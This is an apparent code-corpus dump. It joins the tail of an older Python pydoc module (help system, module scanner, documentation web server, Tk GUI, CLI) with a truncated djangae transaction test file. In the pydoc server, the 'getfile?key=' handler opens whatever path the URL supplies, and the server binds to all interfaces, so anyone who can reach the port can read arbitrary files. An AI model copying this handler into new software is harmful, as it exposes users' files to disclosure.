def showtopic(self, topic, more_xrefs=''):
try:
import pydoc_data.topics
except ImportError:
self.output.write('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''')
return
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
self.output.write('no documentation found for %s\n' % repr(topic))
return
if type(target) is type(''):
return self.showtopic(target, more_xrefs)
label, xrefs = target
try:
doc = pydoc_data.topics.topics[label]
except KeyError:
self.output.write('no documentation found for %s\n' % repr(topic))
return
pager(doc.strip() + '\n')
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
if xrefs:
import formatter
buffer = io.StringIO()
formatter.DumbWriter(buffer).send_flowing_data(
'Related help topics: ' + ', '.join(xrefs.split()) + '\n')
self.output.write('\n%s\n' % buffer.getvalue())
def _gettopic(self, topic, more_xrefs=''):
"""Return unbuffered tuple of (topic, xrefs).
If an error occurs here, the exception is caught and displayed by
the url handler.
This function duplicates the showtopic method but returns its
result directly so it can be formatted for display in an html page.
"""
try:
import pydoc_data.topics
except ImportError:
return('''
Sorry, topic and keyword documentation is not available because the
module "pydoc_data.topics" could not be found.
''' , '')
target = self.topics.get(topic, self.keywords.get(topic))
if not target:
raise ValueError('could not find topic')
if isinstance(target, str):
return self._gettopic(target, more_xrefs)
label, xrefs = target
doc = pydoc_data.topics.topics[label]
if more_xrefs:
xrefs = (xrefs or '') + ' ' + more_xrefs
return doc, xrefs
def showsymbol(self, symbol):
target = self.symbols[symbol]
topic, _, xrefs = target.partition(' ')
self.showtopic(topic, xrefs)
def listmodules(self, key=''):
if key:
self.output.write('''
Here is a list of matching modules. Enter any module name to get more help.
''')
apropos(key)
else:
self.output.write('''
Please wait a moment while I gather a list of all available modules...
''')
modules = {}
def callback(path, modname, desc, modules=modules):
if modname and modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
if modname.find('.') < 0:
modules[modname] = 1
def onerror(modname):
callback(None, modname, None)
ModuleScanner().run(callback, onerror=onerror)
self.list(modules.keys())
self.output.write('''
Enter any module name to get more help. Or, type "modules spam" to search
for modules whose descriptions contain the word "spam".
''')
help = Helper()
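# Usage sketch (illustrative): this module-level Helper instance is what the
# interpreter's built-in help() ultimately delegates to.
#
#     >>> help('while')           # pages the 'while' keyword topic
#     >>> help('modules json')    # lists modules whose synopses mention 'json'
#     >>> help()                  # enters the interactive help> loop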
class Scanner:
"""A generic tree iterator."""
def __init__(self, roots, children, descendp):
self.roots = roots[:]
self.state = []
self.children = children
self.descendp = descendp
def next(self):
if not self.state:
if not self.roots:
return None
root = self.roots.pop(0)
self.state = [(root, self.children(root))]
node, children = self.state[-1]
if not children:
self.state.pop()
return self.next()
child = children.pop(0)
if self.descendp(child):
self.state.append((child, self.children(child)))
return child
class ModuleScanner:
"""An interruptible scanner that searches module synopses."""
def run(self, callback, key=None, completer=None, onerror=None):
if key: key = key.lower()
self.quit = False
seen = {}
for modname in sys.builtin_module_names:
if modname != '__main__':
seen[modname] = 1
if key is None:
callback(None, modname, '')
else:
name = __import__(modname).__doc__ or ''
desc = name.split('\n')[0]
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(None, modname, desc)
for importer, modname, ispkg in pkgutil.walk_packages(onerror=onerror):
if self.quit:
break
# XXX Skipping this file is a workaround for a bug
# that causes python to crash with a segfault.
# http://bugs.python.org/issue9319
#
# TODO Remove this once the bug is fixed.
if modname in {'test.badsyntax_pep3120', 'badsyntax_pep3120'}:
continue
if key is None:
callback(None, modname, '')
else:
try:
loader = importer.find_module(modname)
except SyntaxError:
# raised by tests for bad coding cookies or BOM
continue
if hasattr(loader, 'get_source'):
try:
source = loader.get_source(modname)
except UnicodeDecodeError:
if onerror:
onerror(modname)
continue
desc = source_synopsis(io.StringIO(source)) or ''
if hasattr(loader, 'get_filename'):
path = loader.get_filename(modname)
else:
path = None
else:
try:
module = loader.load_module(modname)
except ImportError:
if onerror:
onerror(modname)
continue
                    # Guard against modules with an empty or missing docstring.
                    desc = module.__doc__.splitlines()[0] if module.__doc__ else ''
path = getattr(module,'__file__',None)
name = modname + ' - ' + desc
if name.lower().find(key) >= 0:
callback(path, modname, desc)
if completer:
completer()
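# Usage sketch (illustrative): ModuleScanner drives both apropos() and the
# GUI search box; the callback receives (path, modname, description) for each
# match, and setting scanner.quit stops the walk early.
#
#     >>> def found(path, modname, desc):
#     ...     print(modname, '-', desc)
#     >>> ModuleScanner().run(found, key='csv')     # doctest: +SKIP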
def apropos(key):
"""Print all the one-line module summaries that contain a substring."""
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
print(modname, desc and '- ' + desc)
def onerror(modname):
pass
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key, onerror=onerror)
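# Usage sketch (illustrative): apropos() backs both "pydoc -k <keyword>" and
# the interactive "modules <keyword>" help command (output abridged).
#
#     >>> apropos('tokenize')     # doctest: +SKIP
#     tokenize - Tokenization help for Python programs.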
# --------------------------------------------------- Web browser interface
def serve(port, callback=None, completer=None):
import http.server, email.message, select
msg = 'the pydoc.serve() function is deprecated'
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class DocHandler(http.server.BaseHTTPRequestHandler):
def send_document(self, title, contents):
try:
self.send_response(200)
self.send_header('Content-Type', 'text/html; charset=UTF-8')
self.end_headers()
self.wfile.write(html.page(title, contents).encode('utf-8'))
except IOError: pass
def do_GET(self):
path = self.path
if path[-5:] == '.html': path = path[:-5]
if path[:1] == '/': path = path[1:]
if path and path != '.':
try:
obj = locate(path, forceload=1)
except ErrorDuringImport as value:
self.send_document(path, html.escape(str(value)))
return
if obj:
self.send_document(describe(obj), html.document(obj, path))
else:
self.send_document(path,
'no Python documentation found for %s' % repr(path))
else:
heading = html.heading(
'<big><big><strong>Python: Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
names = [x for x in sys.builtin_module_names if x != '__main__']
contents = html.multicolumn(names, bltinlink)
indices = ['<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
indices.append(html.index(dir, seen))
contents = heading + ' '.join(indices) + '''<p align=right>
<font color="#909090" face="helvetica, arial"><strong>
pydoc</strong> by Ka-Ping Yee <ping@lfw.org></font>'''
self.send_document('Index of Modules', contents)
def log_message(self, *args): pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
host = 'localhost'
self.address = (host, port)
self.url = 'http://%s:%d/' % (host, port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
def serve_until_quit(self):
import select
self.quit = False
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd: self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback: self.callback(self)
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
try:
try:
DocServer(port, callback).serve_until_quit()
except (KeyboardInterrupt, select.error):
pass
finally:
if completer: completer()
# ----------------------------------------------------- graphical interface
def gui():
"""Graphical interface (starts Web server and pops up a control window)."""
    msg = ('the pydoc.gui() function and "pydoc -g" option are deprecated\n'
           'use the pydoc.browse() function and "pydoc -b" option instead.')
warnings.warn(msg, DeprecationWarning, stacklevel=2)
class GUI:
def __init__(self, window, port=7464):
self.window = window
self.server = None
self.scanner = None
import tkinter
self.server_frm = tkinter.Frame(window)
self.title_lbl = tkinter.Label(self.server_frm,
text='Starting server...\n ')
self.open_btn = tkinter.Button(self.server_frm,
text='open browser', command=self.open, state='disabled')
self.quit_btn = tkinter.Button(self.server_frm,
text='quit serving', command=self.quit, state='disabled')
self.search_frm = tkinter.Frame(window)
self.search_lbl = tkinter.Label(self.search_frm, text='Search for')
self.search_ent = tkinter.Entry(self.search_frm)
self.search_ent.bind('<Return>', self.search)
self.stop_btn = tkinter.Button(self.search_frm,
text='stop', pady=0, command=self.stop, state='disabled')
if sys.platform == 'win32':
# Trying to hide and show this button crashes under Windows.
self.stop_btn.pack(side='right')
self.window.title('pydoc')
self.window.protocol('WM_DELETE_WINDOW', self.quit)
self.title_lbl.pack(side='top', fill='x')
self.open_btn.pack(side='left', fill='x', expand=1)
self.quit_btn.pack(side='right', fill='x', expand=1)
self.server_frm.pack(side='top', fill='x')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
self.search_frm.pack(side='top', fill='x')
self.search_ent.focus_set()
font = ('helvetica', sys.platform == 'win32' and 8 or 10)
self.result_lst = tkinter.Listbox(window, font=font, height=6)
self.result_lst.bind('<Button-1>', self.select)
self.result_lst.bind('<Double-Button-1>', self.goto)
self.result_scr = tkinter.Scrollbar(window,
orient='vertical', command=self.result_lst.yview)
self.result_lst.config(yscrollcommand=self.result_scr.set)
self.result_frm = tkinter.Frame(window)
self.goto_btn = tkinter.Button(self.result_frm,
text='go to selected', command=self.goto)
self.hide_btn = tkinter.Button(self.result_frm,
text='hide results', command=self.hide)
self.goto_btn.pack(side='left', fill='x', expand=1)
self.hide_btn.pack(side='right', fill='x', expand=1)
self.window.update()
self.minwidth = self.window.winfo_width()
self.minheight = self.window.winfo_height()
self.bigminheight = (self.server_frm.winfo_reqheight() +
self.search_frm.winfo_reqheight() +
self.result_lst.winfo_reqheight() +
self.result_frm.winfo_reqheight())
self.bigwidth, self.bigheight = self.minwidth, self.bigminheight
self.expanded = 0
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.window.tk.willdispatch()
import threading
threading.Thread(
target=serve, args=(port, self.ready, self.quit)).start()
def ready(self, server):
self.server = server
self.title_lbl.config(
text='Python documentation server at\n' + server.url)
self.open_btn.config(state='normal')
self.quit_btn.config(state='normal')
def open(self, event=None, url=None):
url = url or self.server.url
import webbrowser
webbrowser.open(url)
def quit(self, event=None):
if self.server:
self.server.quit = 1
self.window.quit()
def search(self, event=None):
key = self.search_ent.get()
self.stop_btn.pack(side='right')
self.stop_btn.config(state='normal')
self.search_lbl.config(text='Searching for "%s"...' % key)
self.search_ent.forget()
self.search_lbl.pack(side='left')
self.result_lst.delete(0, 'end')
self.goto_btn.config(state='disabled')
self.expand()
import threading
if self.scanner:
self.scanner.quit = 1
self.scanner = ModuleScanner()
threading.Thread(target=self.scanner.run,
args=(self.update, key, self.done)).start()
def update(self, path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
self.result_lst.insert('end',
modname + ' - ' + (desc or '(no description)'))
def stop(self, event=None):
if self.scanner:
self.scanner.quit = 1
self.scanner = None
def done(self):
self.scanner = None
self.search_lbl.config(text='Search for')
self.search_lbl.pack(side='left')
self.search_ent.pack(side='right', fill='x', expand=1)
if sys.platform != 'win32': self.stop_btn.forget()
self.stop_btn.config(state='disabled')
def select(self, event=None):
self.goto_btn.config(state='normal')
def goto(self, event=None):
selection = self.result_lst.curselection()
if selection:
modname = self.result_lst.get(selection[0]).split()[0]
self.open(url=self.server.url + modname + '.html')
def collapse(self):
if not self.expanded: return
self.result_frm.forget()
self.result_scr.forget()
self.result_lst.forget()
self.bigwidth = self.window.winfo_width()
self.bigheight = self.window.winfo_height()
self.window.wm_geometry('%dx%d' % (self.minwidth, self.minheight))
self.window.wm_minsize(self.minwidth, self.minheight)
self.expanded = 0
def expand(self):
if self.expanded: return
self.result_frm.pack(side='bottom', fill='x')
self.result_scr.pack(side='right', fill='y')
self.result_lst.pack(side='top', fill='both', expand=1)
self.window.wm_geometry('%dx%d' % (self.bigwidth, self.bigheight))
self.window.wm_minsize(self.minwidth, self.bigminheight)
self.expanded = 1
def hide(self, event=None):
self.stop()
self.collapse()
import tkinter
try:
root = tkinter.Tk()
# Tk will crash if pythonw.exe has an XP .manifest
        # file and the root is not destroyed explicitly.
# If the problem is ever fixed in Tk, the explicit
# destroy can go.
try:
gui = GUI(root)
root.mainloop()
finally:
root.destroy()
except KeyboardInterrupt:
pass
# --------------------------------------- enhanced Web browser interface
def _start_server(urlhandler, port):
"""Start an HTTP server thread on a specific port.
Start an HTML/text server thread, so HTML or text documents can be
browsed dynamically and interactively with a Web browser. Example use:
>>> import time
>>> import pydoc
Define a URL handler. To determine what the client is asking
for, check the URL and content_type.
Then get or generate some text or HTML code and return it.
>>> def my_url_handler(url, content_type):
... text = 'the URL sent was: (%s, %s)' % (url, content_type)
... return text
Start server thread on port 0.
If you use port 0, the server will pick a random port number.
You can then use serverthread.port to get the port number.
>>> port = 0
>>> serverthread = pydoc._start_server(my_url_handler, port)
Check that the server is really started. If it is, open browser
and get first page. Use serverthread.url as the starting page.
>>> if serverthread.serving:
... import webbrowser
The next two lines are commented out so a browser doesn't open if
doctest is run on this module.
#... webbrowser.open(serverthread.url)
#True
Let the server do its thing. We just need to monitor its status.
Use time.sleep so the loop doesn't hog the CPU.
>>> starttime = time.time()
>>> timeout = 1 #seconds
This is a short timeout for testing purposes.
>>> while serverthread.serving:
... time.sleep(.01)
... if serverthread.serving and time.time() - starttime > timeout:
... serverthread.stop()
... break
Print any errors that may have occurred.
>>> print(serverthread.error)
None
"""
import http.server
import email.message
import select
import threading
class DocHandler(http.server.BaseHTTPRequestHandler):
def do_GET(self):
"""Process a request from an HTML browser.
The URL received is in self.path.
Get an HTML page from self.urlhandler and send it.
"""
if self.path.endswith('.css'):
content_type = 'text/css'
else:
content_type = 'text/html'
self.send_response(200)
self.send_header('Content-Type', '%s; charset=UTF-8' % content_type)
self.end_headers()
self.wfile.write(self.urlhandler(
self.path, content_type).encode('utf-8'))
def log_message(self, *args):
# Don't log messages.
pass
class DocServer(http.server.HTTPServer):
def __init__(self, port, callback):
self.host = (sys.platform == 'mac') and '127.0.0.1' or 'localhost'
self.address = ('', port)
self.callback = callback
self.base.__init__(self, self.address, self.handler)
self.quit = False
def serve_until_quit(self):
while not self.quit:
rd, wr, ex = select.select([self.socket.fileno()], [], [], 1)
if rd:
self.handle_request()
self.server_close()
def server_activate(self):
self.base.server_activate(self)
if self.callback:
self.callback(self)
class ServerThread(threading.Thread):
def __init__(self, urlhandler, port):
self.urlhandler = urlhandler
self.port = int(port)
threading.Thread.__init__(self)
self.serving = False
self.error = None
def run(self):
"""Start the server."""
try:
DocServer.base = http.server.HTTPServer
DocServer.handler = DocHandler
DocHandler.MessageClass = email.message.Message
DocHandler.urlhandler = staticmethod(self.urlhandler)
docsvr = DocServer(self.port, self.ready)
self.docserver = docsvr
docsvr.serve_until_quit()
except Exception as e:
self.error = e
def ready(self, server):
self.serving = True
self.host = server.host
self.port = server.server_port
self.url = 'http://%s:%d/' % (self.host, self.port)
def stop(self):
"""Stop the server and this thread nicely"""
self.docserver.quit = True
self.serving = False
self.url = None
thread = ServerThread(urlhandler, port)
thread.start()
# Wait until thread.serving is True to make sure we are
# really up before returning.
while not thread.error and not thread.serving:
time.sleep(.01)
return thread
def _url_handler(url, content_type="text/html"):
"""The pydoc url handler for use with the pydoc server.
If the content_type is 'text/css', the _pydoc.css style
    sheet is read and returned if it exists.
If the content_type is 'text/html', then the result of
get_html_page(url) is returned.
"""
class _HTMLDoc(HTMLDoc):
def page(self, title, contents):
"""Format an HTML page."""
css_path = "pydoc_data/_pydoc.css"
css_link = (
'<link rel="stylesheet" type="text/css" href="%s">' %
css_path)
return '''\
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html><head><title>Pydoc: %s</title>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8">
%s</head><body bgcolor="#f0f0f8">%s<div style="clear:both;padding-top:.5em;">%s</div>
</body></html>''' % (title, css_link, html_navbar(), contents)
def filelink(self, url, path):
return '<a href="getfile?key=%s">%s</a>' % (url, path)
html = _HTMLDoc()
def html_navbar():
version = html.escape("%s [%s, %s]" % (platform.python_version(),
platform.python_build()[0],
platform.python_compiler()))
return """
<div style='float:left'>
Python %s<br>%s
</div>
<div style='float:right'>
<div style='text-align:center'>
<a href="index.html">Module Index</a>
: <a href="topics.html">Topics</a>
: <a href="keywords.html">Keywords</a>
</div>
<div>
<form action="get" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Get">
</form>
<form action="search" style='display:inline;'>
<input type=text name=key size=15>
<input type=submit value="Search">
</form>
</div>
</div>
""" % (version, html.escape(platform.platform(terse=True)))
def html_index():
"""Module Index page."""
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>Index of Modules</strong></big></big>',
'#ffffff', '#7799ee')
names = [name for name in sys.builtin_module_names
if name != '__main__']
contents = html.multicolumn(names, bltinlink)
contents = [heading, '<p>' + html.bigsection(
'Built-in Modules', '#ffffff', '#ee77aa', contents)]
seen = {}
for dir in sys.path:
contents.append(html.index(dir, seen))
contents.append(
'<p align=right><font color="#909090" face="helvetica,'
'arial"><strong>pydoc</strong> by Ka-Ping Yee'
            '&lt;ping@lfw.org&gt;</font>')
return 'Index of Modules', ''.join(contents)
def html_search(key):
"""Search results page."""
# scan for modules
search_result = []
def callback(path, modname, desc):
if modname[-9:] == '.__init__':
modname = modname[:-9] + ' (package)'
search_result.append((modname, desc and '- ' + desc))
with warnings.catch_warnings():
warnings.filterwarnings('ignore') # ignore problems during import
ModuleScanner().run(callback, key)
# format page
def bltinlink(name):
return '<a href="%s.html">%s</a>' % (name, name)
results = []
heading = html.heading(
'<big><big><strong>Search Results</strong></big></big>',
'#ffffff', '#7799ee')
for name, desc in search_result:
results.append(bltinlink(name) + desc)
contents = heading + html.bigsection(
'key = %s' % key, '#ffffff', '#ee77aa', '<br>'.join(results))
return 'Search Results', contents
def html_getfile(path):
"""Get and display a source file listing safely."""
path = path.replace('%20', ' ')
with open(path, 'r') as fp:
lines = html.escape(fp.read())
body = '<pre>%s</pre>' % lines
heading = html.heading(
'<big><big><strong>File Listing</strong></big></big>',
'#ffffff', '#7799ee')
contents = heading + html.bigsection(
'File: %s' % path, '#ffffff', '#ee77aa', body)
return 'getfile %s' % path, contents
def html_topics():
"""Index of topic texts available."""
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.topics.keys())
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Topics', '#ffffff', '#ee77aa', contents)
return 'Topics', contents
def html_keywords():
"""Index of keywords."""
heading = html.heading(
'<big><big><strong>INDEX</strong></big></big>',
'#ffffff', '#7799ee')
names = sorted(Helper.keywords.keys())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
contents = html.multicolumn(names, bltinlink)
contents = heading + html.bigsection(
'Keywords', '#ffffff', '#ee77aa', contents)
return 'Keywords', contents
def html_topicpage(topic):
"""Topic or keyword help page."""
buf = io.StringIO()
htmlhelp = Helper(buf, buf)
contents, xrefs = htmlhelp._gettopic(topic)
if topic in htmlhelp.keywords:
title = 'KEYWORD'
else:
title = 'TOPIC'
heading = html.heading(
'<big><big><strong>%s</strong></big></big>' % title,
'#ffffff', '#7799ee')
contents = '<pre>%s</pre>' % html.markup(contents)
contents = html.bigsection(topic , '#ffffff','#ee77aa', contents)
if xrefs:
xrefs = sorted(xrefs.split())
def bltinlink(name):
return '<a href="topic?key=%s">%s</a>' % (name, name)
xrefs = html.multicolumn(xrefs, bltinlink)
xrefs = html.section('Related help topics: ',
'#ffffff', '#ee77aa', xrefs)
return ('%s %s' % (title, topic),
''.join((heading, contents, xrefs)))
def html_getobj(url):
obj = locate(url, forceload=1)
if obj is None and url != 'None':
raise ValueError('could not find object')
title = describe(obj)
content = html.document(obj, url)
return title, content
def html_error(url, exc):
heading = html.heading(
'<big><big><strong>Error</strong></big></big>',
'#ffffff', '#7799ee')
contents = '<br>'.join(html.escape(line) for line in
format_exception_only(type(exc), exc))
contents = heading + html.bigsection(url, '#ffffff', '#bb0000',
contents)
return "Error - %s" % url, contents
def get_html_page(url):
"""Generate an HTML page for url."""
complete_url = url
if url.endswith('.html'):
url = url[:-5]
try:
if url in ("", "index"):
title, content = html_index()
elif url == "topics":
title, content = html_topics()
elif url == "keywords":
title, content = html_keywords()
elif '=' in url:
op, _, url = url.partition('=')
if op == "search?key":
title, content = html_search(url)
elif op == "getfile?key":
title, content = html_getfile(url)
elif op == "topic?key":
# try topics first, then objects.
try:
title, content = html_topicpage(url)
except ValueError:
title, content = html_getobj(url)
elif op == "get?key":
# try objects first, then topics.
if url in ("", "index"):
title, content = html_index()
else:
try:
title, content = html_getobj(url)
except ValueError:
title, content = html_topicpage(url)
else:
raise ValueError('bad pydoc url')
else:
title, content = html_getobj(url)
except Exception as exc:
# Catch any errors and display them in an error page.
title, content = html_error(complete_url, exc)
return html.page(title, content)
if url.startswith('/'):
url = url[1:]
if content_type == 'text/css':
path_here = os.path.dirname(os.path.realpath(__file__))
css_path = os.path.join(path_here, url)
with open(css_path) as fp:
return ''.join(fp.readlines())
elif content_type == 'text/html':
return get_html_page(url)
# Errors outside the url handler are caught by the server.
raise TypeError('unknown content type %r for url %s' % (content_type, url))
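# Illustrative sketch (not executed here): the handler above can be exercised
# directly, which is also how DocHandler.do_GET calls it. The URLs shown are
# examples of requests the server would receive.
#
#     page = _url_handler('index.html', 'text/html')           # module index page
#     css  = _url_handler('pydoc_data/_pydoc.css', 'text/css')  # style sheet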
def browse(port=0, *, open_browser=True):
"""Start the enhanced pydoc Web server and open a Web browser.
Use port '0' to start the server on an arbitrary port.
Set open_browser to False to suppress opening a browser.
"""
import webbrowser
serverthread = _start_server(_url_handler, port)
if serverthread.error:
print(serverthread.error)
return
if serverthread.serving:
server_help_msg = 'Server commands: [b]rowser, [q]uit'
if open_browser:
webbrowser.open(serverthread.url)
try:
print('Server ready at', serverthread.url)
print(server_help_msg)
while serverthread.serving:
cmd = input('server> ')
cmd = cmd.lower()
if cmd == 'q':
break
elif cmd == 'b':
webbrowser.open(serverthread.url)
else:
print(server_help_msg)
except (KeyboardInterrupt, EOFError):
print()
finally:
if serverthread.serving:
serverthread.stop()
print('Server stopped')
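# Hedged usage sketch: the same server can also be driven programmatically with
# the helpers defined above, without the interactive command loop of browse().
#
#     serverthread = _start_server(_url_handler, 0)
#     if serverthread.serving:
#         print('Documentation server running at', serverthread.url)
#         ...                      # fetch pages, run checks, etc.
#         serverthread.stop()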
# -------------------------------------------------- command-line interface
def ispath(x):
return isinstance(x, str) and x.find(os.sep) >= 0
def cli():
"""Command-line interface (looks at sys.argv to decide what to do)."""
import getopt
class BadUsage(Exception): pass
# Scripts don't get the current directory in their path by default
# unless they are run with the '-m' switch
if '' not in sys.path:
scriptdir = os.path.dirname(sys.argv[0])
if scriptdir in sys.path:
sys.path.remove(scriptdir)
sys.path.insert(0, '.')
try:
opts, args = getopt.getopt(sys.argv[1:], 'bgk:p:w')
writing = False
start_server = False
open_browser = False
port = None
for opt, val in opts:
if opt == '-g':
gui()
return
if opt == '-b':
start_server = True
open_browser = True
if opt == '-k':
apropos(val)
return
if opt == '-p':
start_server = True
port = val
if opt == '-w':
writing = True
        if start_server:
            if port is None:
port = 0
browse(port, open_browser=open_browser)
return
if not args: raise BadUsage
for arg in args:
if ispath(arg) and not os.path.exists(arg):
print('file %r does not exist' % arg)
break
try:
if ispath(arg) and os.path.isfile(arg):
arg = importfile(arg)
if writing:
if ispath(arg) and os.path.isdir(arg):
writedocs(arg)
else:
writedoc(arg)
else:
help.help(arg)
except ErrorDuringImport as value:
print(value)
except (getopt.error, BadUsage):
cmd = os.path.splitext(os.path.basename(sys.argv[0]))[0]
print("""pydoc - the Python documentation tool
{cmd} <name> ...
Show text documentation on something. <name> may be the name of a
Python keyword, topic, function, module, or package, or a dotted
reference to a class or function within a module or module in a
package. If <name> contains a '{sep}', it is used as the path to a
Python source file to document. If name is 'keywords', 'topics',
or 'modules', a listing of these things is displayed.
{cmd} -k <keyword>
Search for a keyword in the synopsis lines of all available modules.
{cmd} -p <port>
Start an HTTP server on the given port on the local machine. Port
number 0 can be used to get an arbitrary unused port.
{cmd} -b
Start an HTTP server on an arbitrary unused port and open a Web browser
to interactively browse documentation. The -p option can be used with
the -b option to explicitly specify the server port.
{cmd} -g
Deprecated.
{cmd} -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '{sep}', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""".format(cmd=cmd, sep=os.sep))
if __name__ == '__main__':
cli()
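# Illustrative command lines corresponding to the usage text above (the command
# name depends on how the script is installed; "pydoc" is assumed here):
#
#     pydoc -b                # serve docs on a free port and open a browser
#     pydoc -p 8080           # serve docs on port 8080
#     pydoc -k socket         # search module synopses for "socket"
#     pydoc -w json           # write json.html to the current directory
#     pydoc threading.Thread  # show text documentation for a dotted name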
|
test_transactional.py
|
# STANDARD LIB
import threading
# THIRD PARTY
from google.appengine.runtime import DeadlineExceededError
# DJANGAE
from djangae.db import transaction
from djangae.db.caching import DisableCache
from djangae.contrib import sleuth
from djangae.test import TestCase
class TransactionTests(TestCase):
def test_repeated_usage_in_a_loop(self):
from .test_connector import TestUser
pk = TestUser.objects.create(username="foo").pk
for i in range(4):
with transaction.atomic(xg=True):
TestUser.objects.get(pk=pk)
continue
with transaction.atomic(xg=True):
TestUser.objects.get(pk=pk)
def test_recursive_atomic(self):
lst = []
@transaction.atomic
def txn():
lst.append(True)
if len(lst) == 3:
return
else:
txn()
txn()
def test_recursive_non_atomic(self):
lst = []
@transaction.non_atomic
def txn():
lst.append(True)
if len(lst) == 3:
return
else:
txn()
txn()
def test_atomic_in_separate_thread(self):
""" Regression test. See #668. """
@transaction.atomic
def txn():
return
def target():
txn()
thread = threading.Thread(target=target)
thread.start()
thread.join()
def test_non_atomic_in_separate_thread(self):
""" Regression test. See #668. """
@transaction.non_atomic
def txn():
return
def target():
txn()
thread = threading.Thread(target=target)
thread.start()
thread.join()
def test_atomic_decorator(self):
from .test_connector import TestUser
@transaction.atomic
def txn():
TestUser.objects.create(username="foo", field2="bar")
self.assertTrue(transaction.in_atomic_block())
raise ValueError()
with self.assertRaises(ValueError):
txn()
self.assertEqual(0, TestUser.objects.count())
def test_atomic_decorator_catches_deadlineexceedederror(self):
""" Regression test for #1107 . Make sure DeadlineExceededError causes the transaction to
be rolled back.
"""
from .test_connector import TestUser
@transaction.atomic
def txn():
TestUser.objects.create(username="foo", field2="bar")
self.assertTrue(transaction.in_atomic_block())
raise DeadlineExceededError()
with self.assertRaises(DeadlineExceededError):
txn()
self.assertEqual(0, TestUser.objects.count())
def test_interaction_with_datastore_txn(self):
from google.appengine.ext import db
from google.appengine.datastore.datastore_rpc import TransactionOptions
from .test_connector import TestUser
@db.transactional(propagation=TransactionOptions.INDEPENDENT)
def some_indie_txn(_username):
TestUser.objects.create(username=_username)
@db.transactional()
def some_non_indie_txn(_username):
TestUser.objects.create(username=_username)
@db.transactional()
def double_nested_transactional():
@db.transactional(propagation=TransactionOptions.INDEPENDENT)
def do_stuff():
TestUser.objects.create(username="Double")
raise ValueError()
try:
                return do_stuff()
except Exception:
return
with transaction.atomic():
double_nested_transactional()
@db.transactional()
def something_containing_atomic():
with transaction.atomic():
TestUser.objects.create(username="Inner")
something_containing_atomic()
with transaction.atomic():
with transaction.atomic():
some_non_indie_txn("Bob1")
some_indie_txn("Bob2")
some_indie_txn("Bob3")
with transaction.atomic(independent=True):
some_non_indie_txn("Fred1")
some_indie_txn("Fred2")
some_indie_txn("Fred3")
def test_atomic_context_manager(self):
from .test_connector import TestUser
with self.assertRaises(ValueError):
with transaction.atomic():
TestUser.objects.create(username="foo", field2="bar")
raise ValueError()
self.assertEqual(0, TestUser.objects.count())
def test_atomic_context_manager_catches_deadlineexceedederror(self):
""" Make sure that DeadlineExceededError causes the transaction to be rolled back when
using atomic() as a context manager.
"""
from .test_connector import TestUser
with self.assertRaises(DeadlineExceededError):
with transaction.atomic():
TestUser.objects.create(username="foo", field2="bar")
raise DeadlineExceededError()
self.assertEqual(0, TestUser.objects.count())
def test_non_atomic_context_manager(self):
from .test_connector import TestUser
existing = TestUser.objects.create(username="existing", field2="exists")
with transaction.atomic():
self.assertTrue(transaction.in_atomic_block())
user = TestUser.objects.create(username="foo", field2="bar")
with transaction.non_atomic():
# We're outside the transaction, so the user should not exist
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user.pk)
self.assertFalse(transaction.in_atomic_block())
with sleuth.watch("google.appengine.api.datastore.Get") as datastore_get:
TestUser.objects.get(pk=existing.pk) # Should hit the cache, not the datastore
self.assertFalse(datastore_get.called)
with transaction.atomic(independent=True):
user2 = TestUser.objects.create(username="foo2", field2="bar2")
self.assertTrue(transaction.in_atomic_block())
with transaction.non_atomic():
self.assertFalse(transaction.in_atomic_block())
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user2.pk)
with transaction.non_atomic():
self.assertFalse(transaction.in_atomic_block())
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user2.pk)
with sleuth.watch("google.appengine.api.datastore.Get") as datastore_get:
# Should hit the cache, not the Datastore
TestUser.objects.get(pk=existing.pk)
self.assertFalse(transaction.in_atomic_block())
self.assertRaises(TestUser.DoesNotExist, TestUser.objects.get, pk=user2.pk)
self.assertTrue(TestUser.objects.filter(pk=user2.pk).exists())
self.assertTrue(transaction.in_atomic_block())
def test_xg_argument(self):
from .test_connector import TestUser, TestFruit
@transaction.atomic(xg=True)
def txn(_username):
TestUser.objects.create(username=_username, field2="bar")
TestFruit.objects.create(name="Apple", color="pink")
raise ValueError()
with self.assertRaises(ValueError):
txn("foo")
self.assertEqual(0, TestUser.objects.count())
self.assertEqual(0, TestFruit.objects.count())
def test_independent_argument(self):
"""
